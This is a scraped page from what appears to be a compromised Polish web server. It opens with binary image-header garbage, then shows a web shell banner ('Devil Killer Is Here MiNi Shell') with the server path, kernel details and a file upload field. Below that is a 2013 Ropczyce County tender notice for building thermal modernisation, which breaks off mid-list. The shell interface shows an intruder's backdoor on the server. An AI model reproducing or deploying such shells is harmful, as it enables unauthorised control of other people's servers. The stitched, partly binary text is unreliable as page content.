JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130607/104205-N-2013.html

<p class="kh_header"><b>Ropczyce: Poprawa efektywności gospodarki cieplnej budynków użyteczności publicznej Powiatu Ropczycko - Sędziszowskiego - II etap</b><br>
<b>Numer ogłoszenia: 104205 - 2013; data zamieszczenia: 07.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Ropczycko - Sędziszowski , ul. Konopnickiej 5, 39-100 Ropczyce, woj. podkarpackie, tel. 017 2218306, faks 017 2228571.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spropczyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa efektywności gospodarki cieplnej budynków użyteczności publicznej Powiatu Ropczycko - Sędziszowskiego - II etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane związane z realizacją zadania pn.: Poprawa efektywności gospodarki cieplnej budynków użyteczności publicznej Powiatu Ropczycko - Sędziszowskiego - II etap.
Zamawiający podzielił przedmiot zamówienia na cztery części - zadania:
Część 1 
Termomodernizacja budynku warsztatów szkolnych Zespołu Szkół Agro - Technicznych                    w Ropczycach
Część 2  
1. Przebudowa kotłowni gazowej oraz budowa instalacji solarnej w Domu Pomocy Społecznej w Rudzie
	2. Modernizacja kotłowni gazowej, budowa instalacji solarnej i modułu kogeneracyjnego                    w Domu Pomocy Społecznej w Lubzinie
Część 3
	1. Termomodernizacja budynku Ośrodka Zdrowia w Zagorzycach
	2. Budowa dachu na budynku Ośrodka Zdrowia w Zagorzycach
Część 4
	1. Termomodernizacja budynku Ośrodka Zdrowia w Iwierzycach
	2. Budowa dachu na budynku Ośrodka Zdrowia w Iwierzycach
	
Opis przedmiotu zamówienia:
	
Część 1 - Termomodernizacja budynku warsztatów szkolnych Zespołu Szkół Agro - Technicznych w Ropczycach

Zakres zamówienia obejmuje:

a) docieplenie ścian nadziemia
b) docieplenie ścian poniżej terenu
c) docieplenie stropodachu
d) wymiana stolarki okiennej drewnianej
e) instalacja c.o.

Zakres prac, sposób wykonania robót budowlanych, rodzaj materiałów i urządzeń określają szczegółowo: dokumentacja projektowa (załącznik nr 9.1 do siwz), Specyfikacje Techniczne Wykonania  i Odbioru Robót Budowlanych (załącznik nr 8.1 do siwz) i przedmiary robót (załącznik nr 1.1 do siwz),  

Część 2  
1. Przebudowa kotłowni gazowej oraz budowa instalacji solarnej w Domu Pomocy Społecznej w Rudzie
	2. Modernizacja kotłowni gazowej, budowa instalacji solarnej i modułu kogeneracyjnego                    w Domu Pomocy Społecznej w Lubzinie

Zakres zamówienia obejmuje:

Ad 1) 

a) roboty budowlane w kotłowni
b) wzmocnienie konstrukcji dachu
c) montaż zasilania elektrycznego instalacji solarnej - montaż zasilania
d) montaż zasilania elektrycznego instalacji solarnej - montaż rozdzielni
e) montaż zasilania elektrycznego instalacji solarnej - montaż przewodów i osprzętu
f) montaż instalacji detekcji gazu - montaż przewodów
g) montaż instalacji detekcji gazu - montaż aparatów
h) instalacja połączeń wyrównawczych
i) montaż instalacji odgromowej
j) wymiana urządzeń kotłowni gazowej
k) system bezpieczeństwa instalacji gazowej
l) instalacja solarna - obieg solarny
ł) instalacja solarna - obieg grzewczy - ładowanie bufora
m) instalacja solarna - obieg grzewczy - rozładowanie bufora
n) instalacja solarna - obieg wstępnego podgrzewu c.w.u.
o) instalacja solarna - rurociągi
p) roboty pozostałe


Zakres prac, sposób wykonania robót budowlanych, rodzaj materiałów i urządzeń określają szczegółowo: dokumentacja projektowa (załącznik nr 9.2.1 do siwz), Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (załącznik nr 8.2.1 do siwz) i przedmiary robót (załącznik nr 1.2.1 do siwz),  

Ad. 2)

a) modernizacja kotłowni - wbudowanie instalacji solarnej i modułu kogeneracyjnego
b) budowa modułu kogeneracyjnego i instalacji solarnej - instalacja c.o.
c) instalacja kolektorów słonecznych 
d) instalacja wody
e) instalacja gazu
f) instalacja wentylacyjna i spalinowa
g) roboty budowlane

Zakres prac, sposób wykonania robót budowlanych, rodzaj materiałów i urządzeń określają szczegółowo: dokumentacja projektowa (załącznik nr 9.2.2 do siwz), Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (załącznik nr 8.2.2 do siwz) i przedmiary robót (załącznik nr 1.2.2 do siwz),  

Część 3
1. Termomodernizacja budynku Ośrodka Zdrowia w Zagorzycach
	2. Budowa dachu na budynku Ośrodka Zdrowia w Zagorzycach

Zakres zamówienia obejmuje:

Ad 1)

a) wymiana stolarki okiennej i drzwiowej
b) wykonanie izolacji zewnętrznej ścian piwnic
c) elewacja
d) ościeża
e) wywóz i utylizacja gruzu - roboty elewacyjne
f) instalacja odgromowa
g) rusztowania
h) instalacja c.o.
i) instalacja solarna
j) wewnętrzna instalacja gazu

Zakres prac, sposób wykonania robót budowlanych, rodzaj materiałów i urządzeń określają szczegółowo: dokumentacja projektowa (załącznik nr 9.3.1 do siwz), Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (załącznik nr 8.3.1 do siwz) i przedmiary robót (załącznik nr 1.3.1 do siwz),  

Ad 2)

a) remont stropodachu
b) roboty rozbiórkowe
c) konstrukcje dachowe
d) pokrycie dachu blachą dachówkopodobną
e) obróbki

Zakres prac, sposób wykonania robót budowlanych, rodzaj materiałów i urządzeń określają szczegółowo:,  dokumentacja projektowa (załącznik nr 9.3.2 do siwz), Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (załącznik nr 8.3.2 do siwz) i przedmiary robót (załącznik nr 1.3.2 do siwz)

Część 4
	1. Termomodernizacja budynku Ośrodka Zdrowia w Iwierzycach
	2. Budowa dachu na budynku Ośrodka Zdrowia w Iwierzycach

Zakres zamówienia obejmuje:

Ad. 1)

a) wymiana stolarki piwnicznej
b) wykonanie izolacji zewnętrznej ścian piwnic
c) elewacja
d) ościeża elewacji
e) remont wejścia do przychodni
f) remont murków przy wjeździe do garażu
g) wywóz i utylizacja gruzu - roboty elewacyjne
h) instalacja odgromowa
i) rusztowania
j) zadaszenie nad wejściami
k) remont balkonów
l) zadaszenia nad balkonami
ł) instalacja solarna
m) wewnętrzna instalacja gazu
n) instalacja c.o.

Zakres prac, sposób wykonania robót budowlanych, rodzaj materiałów i urządzeń określają szczegółowo: dokumentacja projektowa (załącznik nr 9.4.1 do siwz), Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (załącznik nr 8.4.1 do siwz) i przedmiary robót (załącznik nr 1.4.1 do siwz),  
Ad 2)

a) remont stropodachu
b) roboty rozbiórkowe
c) konstrukcje dachowe
d) pokrycie dachu blachą dachówkopodobną
e) obróbki

Zakres prac, sposób wykonania robót budowlanych, rodzaj materiałów i urządzeń określają szczegółowo: dokumentacja projektowa (załącznik nr 9.4.2 do siwz,  Specyfikacje Techniczne Wykonania  i Odbioru Robót Budowlanych (załącznik nr 8.4.2 do siwz) i przedmiary robót (załącznik nr 1.4.2 do siwz),  

Wykonawca zobowiązany jest do wykonania robót zgodnie z dokumentacja projektową, specyfikacją techniczną wykonania i odbioru robót budowlanych, przedmiarami robót, przepisami prawa budowlanego oraz sztuką budowlaną. Przedmiary robót mają charakter pomocniczy i mają na celu ułatwienie dokonania wyceny robót. Oznacza to, że prace które zostały ujęte w dokumentacji projektowej wchodzą w zakres zamówienia podstawowego nawet jeśli zostały pominięte w przedmiarach robót.


UWAGA: Przy ustalaniu właściwej stawki podatku VAT dla części 2 zamówienia należy uwzględnić fakt, że roboty budowlane będą prowadzone w budynkach sklasyfikowanych według PKOB w grupowaniu 1130 (budynek domu pomocy społecznej) Roboty budowlane będą realizowane w części budynków trwale związanych z konstrukcją tego budynku. 
UWAGA: Z uwagi na odrębne źródła finansowania Zamawiający w części 3 i 4 zamówienia zawrze z wybranym Wykonawcą dwie umowy. Osobną na termomodernizację budynków oraz osobną  na budowę dachów


2. Ponadto w ramach zamówienia Wykonawca jest zobowiązany do:
- wykonania niezbędnych prób i odbiorów,
- przygotowania niezbędnych dokumentów wymaganych do realizacji, jak: oświadczenia kierownika budowy, kierowników robót, opracowanie planu bezpieczeństwa i ochrony zdrowia, a także wszystkie inne wymagane dokumenty do końcowego odbioru robót.
3.  Przedmiot zamówienia należy wykonać zgodnie z obowiązującymi przepisami, w tym: m.in. przepisami BHP, PN, zasadami wiedzy technicznej, warunkami technicznymi wykonania                       i odbiory robót, należytą starannością, właściwą organizacją, bezpiecznie i dobrze jakościowo.
4.  Użyte przy realizacji materiały winny spełniać wymagania określone w art. 10 Prawa budowlanego oraz winny posiadać dokumenty potwierdzające dopuszczenie do użytkowania                     i spełniania odpowiednich norm.
5.  Dopuszcza się do zastosowania przy realizacji zamówienia materiałów równoważnych                     o parametrach nie gorszych niż zaproponowane w dokumentacji projektowej, po akceptacji Zamawiającego. Zamawiający dopuszcza jednocześnie wszelkie ich odpowiedniki rynkowe nie gorsze niż wskazane. Parametry wskazanego przez Zamawiającego standardu przedstawiają warunki techniczne, eksploatacyjne, użytkowe, funkcjonalne oraz inne cechy istotne dla przedmiotu zamówienia, natomiast wskazana marka lub nazwa handlowa określa klasę produktu, a nie konkretnego producenta.
6.  Wymagany okres gwarancji 36 m-cy liczony od daty protokolarnego końcowego odbioru przedmiotu zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.42.10.00-4, 45.33.12.10-1, 45.31.00.00-3, 45.33.30.00-0, 45.33.11.10-0, 45.45.30.00-7, 45.11.12.20-6, 45.31.70.00-2, 45.26.21.00-2, 45.32.10.00-3, 45.26.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium w wysokości:
Część 1, 3 i 4 - 10.000,00 zł (słownie: dziesięć tysięcy 00/100 złotych) na każdą część
Część 2 - 20.000,00 zł (słownie: dwadzieścia tysięcy 00/100 złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga 	posiadania specjalnych uprawnień. Wykonawca uzna warunek za spełniony, jeżeli Wykonawca potwierdzi spełnienie tego warunku składając odpowiednie oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części 1 zamówienia:
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca odpowiednio 	udokumentuje, że wykonał w okresie ostatnich 5 lat, a jeżeli okres działalności jest krótszy                w tym okresie, co najmniej 2 roboty budowlano-remontowe związane z termomodernizacją obiektów o porównywalnym rodzaju robót budowlanych i instalacyjnych o wartości nie mniejszej niż 250 000,00 brutto zł każda (słownie: dwieście pięćdziesiąt tysięcy 00/100 złotych). Zamawiający uzna dane zamówienie, jeżeli zostanie ono poparte dokumentem potwierdzającym, że w/w roboty zostały wykonane zgodnie  z zasadami sztuki budowlanej                  i prawidłowo ukończone.
Dla części 2 zamówienia:
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca odpowiednio 	udokumentuje, że wykonał w okresie ostatnich 5 lat, a jeżeli okres działalności jest krótszy                w tym okresie, co najmniej 2 roboty budowlano-remontowe związane z budową/montażem instalacji solarnej o porównywalnym rodzaju robót budowlanych i instalacyjnych o wartości nie mniejszej niż 250 000,00 brutto zł każda (słownie: dwieście pięćdziesiąt tysięcy 00/100 złotych). Zamawiający uzna dane zamówienie, jeżeli zostanie ono poparte dokumentem potwierdzającym, że w/w roboty zostały wykonane zgodnie  z zasadami sztuki budowlanej                  i prawidłowo ukończone.
Dla części 3 i 4 zamówienia:
Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca odpowiednio 	udokumentuje, że zrealizował w okresie ostatnich 5 lat, a jeżeli okres działalności jest krótszy w tym okresie, co najmniej 2 roboty budowlano-remontowe, w tym: co najmniej jedną obejmującą swym zakresem wykonanie termomodernizacji obiektów o porównywalnym rodzaju robót budowlanych i instalacyjnych, (tj. docieplenie ścian i wymianę/montaż/ stolarki okiennej) o wartości nie mniejszej niż 150 000,00 brutto zł oraz co najmniej jedną obejmującą swym zakresem wykonanie pokryć  i konstrukcji dachowych o wartości nie mniejszej niż 150 000,00 brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego opisu sposobu dokonywania oceny spełnienia tego warunku. Wykonawcy w celu. Wykonawca uzna warunek za spełniony, jeżeli Wykonawca potwierdzi spełnienie tego warunku składając odpowiednie oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca odpowiednio udokumentuje, że dysponuje co najmniej po 1 osobie posiadającej odpowiednie uprawnienia budowlane do kierowania robotami budowlanymi w specjalności: konstrukcyjno- budowlanej i instalacji sanitarnych, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca udokumentuje, że dysponuje środkami finansowymi lub posiada zdolność kredytową  w wysokości co najmniej 200 000,00 zł brutto</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>kosztorys ofertowy sporządzony metodą uproszczoną</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia w przyszłej umowie następujących zmian 	w stosunku do treści oferty;
1. Wydłużenie terminu wykonania przedmiotu umowy o czas opóźnienia wynikły z przyczyn leżących po stronie zamawiającego, jeżeli takie opóźnienie będzie miało wpływ  na wykonanie przedmiotu umowy, w szczególności w wykonaniu następujących zobowiązań:
- przekazanie terenu budowy (np. związane z wydłużeniem terminu związania ofertą),
- przekazanie dokumentów budowy (pozwolenia na budowę, dokumentacji technicznej, specyfikacji technicznych, innych wymaganych przepisami, do których zamawiający był zobowiązany)
- przekazania dokumentów zamiennych budowy lub usunięcia wad w dostarczonej dokumentacji,
- zapewnienia możliwości poboru wody i energii elektrycznej na potrzeby budowy,
- zmiany terminu dokonania prób końcowych i wniosku o dokonanie prób dodatkowych nie objętych umową, 
- zmiany terminu dokonania odbiorów przewidzianych w umowie,
- jakiegokolwiek opóźnienia, utrudnienia lub przeszkód spowodowanych przez lub dających się przypisać zamawiającemu, lub innemu wykonawcy, zatrudnionemu przez zamawiającego na terenie budowy objętym przedmiotem zamówienia.
2. Wydłużenie terminu wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie będzie miało wpływ na wykonanie przedmiotu umowy, w przypadku:
- zawieszenia robót przez zamawiającego,
- wykopalisk uniemożliwiających wykonanie robót,
- szczególnie niesprzyjających warunków atmosferycznych
- zmian dokumentacji projektowej, dokonanych na wniosek zamawiającego lub wykonawcy oraz stwierdzenia wad w dokumentacji 
- wystąpienie robót dodatkowych,
- siły wyższej,
3. Skrócenie terminu wykonania zamówienia
4. Rezygnacja z części robót.
5. Zmiany w kolejnościach i terminach wykonywania robót budowlanych ujętych                                      w harmonogramie rzeczowo-finansowym.
6. Poprawa jakości lub innych parametrów charakterystycznych dla danego elementu robót budowlanych lub zmiana technologii wykonywania robót budowlanych.
7. Zmiana kluczowych specjalistów realizacji przedmiotu zamówienia, w szczególności 	Kierownika budowy i Inspektora nadzoru.
8. Zmiany podwykonawców
9. Podniesienie bezpieczeństwa prowadzonych robót
10.  Wprowadzenia robót zamiennych w stosunku do przewidzianych dokumentacją projektową, w sytuacji gdy wykonanie tych robót będzie niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy. 

11. Powyższe zmiany mogą być zainicjowane na wniosek Zamawiającego lub Wykonawcy (najpierw ustny, później pisemny) w sprawie proponowanej zmiany. Może to być:
- wniosek zamawiającego o dokonanie wskazanej zmiany,
- wniosek zamawiającego, aby Wykonawca przedłożył propozycję zmiany,
- wniosek wykonawcy.

12. Wniosek taki, aby mogła się do niego ustosunkować druga strona musi zawierać:
- opis zmiany,
- uzasadnienie zmiany,
- koszt zmiany oraz wpływ na wysokość wynagrodzenia,
- czas wykonania zmiany oraz wpływ zmiany na termin zakończenia realizacji umowy

